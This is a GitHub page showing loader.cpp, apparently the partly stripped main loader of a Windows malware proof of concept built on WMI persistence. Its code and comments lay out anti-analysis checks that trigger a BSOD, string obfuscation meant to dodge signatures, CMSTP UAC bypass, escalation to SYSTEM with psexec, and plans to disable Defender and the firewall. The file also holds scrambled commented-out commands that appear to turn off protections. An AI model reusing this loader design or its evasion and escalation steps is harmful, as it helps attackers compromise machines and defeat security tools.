forked from mbinns/WMI-PoC
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathloader.cpp
More file actions
executable file
·222 lines (190 loc) · 9.38 KB
/
loader.cpp
File metadata and controls
executable file
·222 lines (190 loc) · 9.38 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
// Loader
// !!!!!!!!!!!
// HAS BEEN MOSTLY DISABLED, prior to uploading
// I removed most of the code from the loader to prevent copy/paste replication
// If you want to see how it works you'll have to actually read the classes.
// Contains the main logic for the installer
/*
With very few exceptions, every string in the loader is
encrypted with a modified railfence cipher. This has three
advantages:
1. The modifications make it mildly annoying to reverse
2. The modifications make it easy to modify the cipher and
subsequently change the signature of every string
3. The strings have low entropy, so we can store an arbitrary
number of them without packer detection being triggered
*/
/*
┌──────────────────┐ ┌───────────────────────┐ ┌──────────┐
│ Initial State ├─────►│ Detect VM/Debugger ├─────►│ BSOD │
└──────────────────┘ └───────────┬───────────┘ └──────────┘
│
│
▼
┌───────────────────────┐
│Detect Multi Instances ├───────────┐
└───────────┬───────────┘ │
│ │
│ │
▼ │
┌───────────────────────┐ │
│ Auto Escalation ├─────┐ │
└───────────┬───────────┘ │ │
┌──────────────────┐ │ │ │
│ Failsafe Install │ │ │ │
└──────────────────┘ │ │ │
▲ ▼ │ │
│ ┌──────────────────────┐ │ │
└─────────────────┤ Manual Escalation │ │ │
└──────────┬───────────┘ │ │
│ │ │
│ │ │
│ │ │
▼ │ │
┌──────────────────────┐ │ │
│ Disable Antivirus │◄────┘ │
└──────────┬───────────┘ │
│ │
┌─────────────────┐ │ │
│ Terminate │ ◄────────────────┼───────────────────────┘
└─────────────────┘ │
▲ ▲ ▼
│ │ ┌──────────────────────┐
│ └─────────────┤ Create FTC Binders │
│ └──────────┬───────────┘
│ │
│ │
│ ▼
│ ┌──────────────────────┐
└───────────────────┤ Write WMI Payloads │
└──────────────────────┘
*/
#pragma once
#include "loader.h"
#include "ExportInterface.hpp"
#include "AutoElevation.hpp"
LONG WINAPI ExceptionHandler(PEXCEPTION_POINTERS pExceptionInfo) {
HANDLE hEvent = CreateEventW(NULL, TRUE, FALSE, L"Global\\{MAOZDONG-SAYS-KILL-EVRY-LANDLORDDDDD}");
if(hEvent != 0)
ResetEvent(hEvent);
return EXCEPTION_CONTINUE_SEARCH;
}
int main()
{
// -----------------------------------------------------
// -- Setup --------------------------------------------
// Wrapper class definitions
COMWrapper COM;
NtWrapper ntdll;
KernelbaseWrapper IKB;
Win32Wrapper IWin32;
ShellWrapper IShell;
SetupAPIWrapper ISetupAPI;
ExceptionWrapper IException;
Railfence ciph;
// Dependency injected class definitions
WMIConnection WMI(COM);
UACInterface IUAC(COM, IWin32, IKB);
AntiAnalysis mxAntiAnalysis(ISetupAPI, ntdll);
AutoElevation AutoElevate(COM, ciph, IUAC);
// Anti-Analysis checks
// Pretty much only effective against automated analysis
mxAntiAnalysis.Execute();
//WMIDiagnostic(COM, WMI);
// Create a global event, we'll use it as a mutex to prevent multiple instances of the loader
// from running at the same time. Far less heuristically suspicious than using pipes.
// Also has the lowest score of all possible communication options on a MITRE attack matrix.
HANDLE hEvent = CreateEventW(NULL, TRUE, FALSE, L"Global\\{MAOZDONG-SAYS-KILL-EVRY-LANDLORDDDDD}");
if(!hEvent)
return 0;
// Check if the global event already exists
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
// If it does, check if the event is set
if(hEvent != 0) // Corrupted stack check
if (WaitForSingleObject(hEvent, 0) == WAIT_OBJECT_0)
{
// If it's set, we need to exit
ILog("Still running\n");
return 0;
}
else
{
ILog("Not running\n");
}
}
// Prevent event from remaining set if the process crashes
if (IException.IReady)
IException.SetUnhandledExceptionFilter(ExceptionHandler);
// Set the event mutex
SetEvent(hEvent);
// Get our current elevation level
ULONG ElevationLevel = IUAC.CheckElevation();
// This event will be set if we're escalated
// This is how we know whether to exit our unprivileged instance
// or revert to a failsfe install
const HANDLE hEscalated = CreateEvent(0, FALSE, FALSE, L"{REDISTRIBUTED-ADMIN-PRIVS-COMRADE}");
// -----------------------------------------------------
// -- Execution ----------------------------------------
switch (ElevationLevel)
{
case 0x1:
// Elevated: UAC is disabled or user is the built-in admin
// - 1. Disable Windows Defender (if enabled)
// - 2. Disable Windows Firewall
// - 3. Install
ILog("We are elevated\n");
SetEvent(hEscalated);
system("PAUSE");
break;
case 0x2:
// Elevated: UAC is enabled and user is in the admin group
// - 1. Disable UAC
// - 2. Disable Windows Defender (if enabled)
// - 3. Disable Windows Firewall
// - 4. Install
ILog("We are elevated\n");
system("psexec -i -s cmd.exe");
SetEvent(hEscalated);
system("PAUSE");
break;
case 0x3:
// Not Elevated: UAC is enabled and user is in the admin group
// - 1. Perform CMSTP autoelevation
// - 2. If unsuccessful, perform user-mode installation
// Otherwise we're at level 2
ILog("We are not elevated\n");
system("PAUSE");
ResetEvent(hEvent);
if (AutoElevate.IReady)
if (!AutoElevate.AutoElevate())
{
// Escalation failed
ILog("Escalation failed\n");
}
else
{
// Escalation succeeded
ILog("Escalation successful\n");
}
break;
case 0x4:
// Not Elevated: UAC is enabled and user is not in the admin group
// - 1. Perform user-mode installation
break;
default:
// Unknown error
break;
}
// Execute some shell commands
// Just test code
if (IShell.IReady)
{
//IShell.Execute("bec.xdteeid", "open", "-ncnsityhoeoete tngics rk");
//IShell.Execute("ploelwh.eseerx", "open", "Se eeieerfe-lRmMrnutPecDbeioogr-prniaatnt tMesli$");
}
// Cleanup
ResetEvent(hEvent);
ResetEvent(hEscalated);
return 0;
}